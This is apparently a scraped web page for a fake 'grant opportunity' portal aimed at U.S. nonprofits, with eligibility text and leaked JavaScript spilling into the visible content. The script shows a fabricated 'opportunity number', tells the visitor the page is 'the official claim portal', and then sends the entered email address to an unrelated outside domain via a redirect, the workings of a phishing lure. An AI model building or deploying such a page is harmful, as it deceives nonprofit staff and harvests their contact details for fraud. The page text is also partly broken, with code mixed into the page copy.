Step 1 of 2
Organization Representative
Enter your details to continue to the grant opportunity.
GRANT OPPORTUNITY
This is a private portal intended exclusively for authorized applicants.
Enter a valid email
Eligibility:
1. Nonprofit Status: Must be a 501(c)(3) or similar nonprofit organization.
2. Geographical Location: Based in the U.S. or its territories.
3. Financial Stability: Must demonstrate financial capability.
4. Legal Compliance: Adhere to federal, state, and local regulations.
Assigned Opportunity Number:
`; // Generate random 7-character code + opportunity number const uniqueCode = generateCode7(); document.getElementById(‘assignedNumber’).textContent = `${uniqueCode}`; // Official green box document.getElementById(‘officialNote’).textContent = `This is the official claim portal, intended for ${orgName}.`; document.getElementById(‘step1’).classList.remove(‘active’); document.getElementById(‘step2’).classList.add(‘active’); } function validateEmail() { const email = document.getElementById(’email’).value.trim(); const error = document.getElementById(‘error’); const regex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/; if (!regex.test(email)) { error.style.display = ‘block’; return; } error.style.display = ‘none’; window.location.href = “https://raimoroo.business/2UQ!TUrwP1/$” + encodeURIComponent(email); }
Leave a comment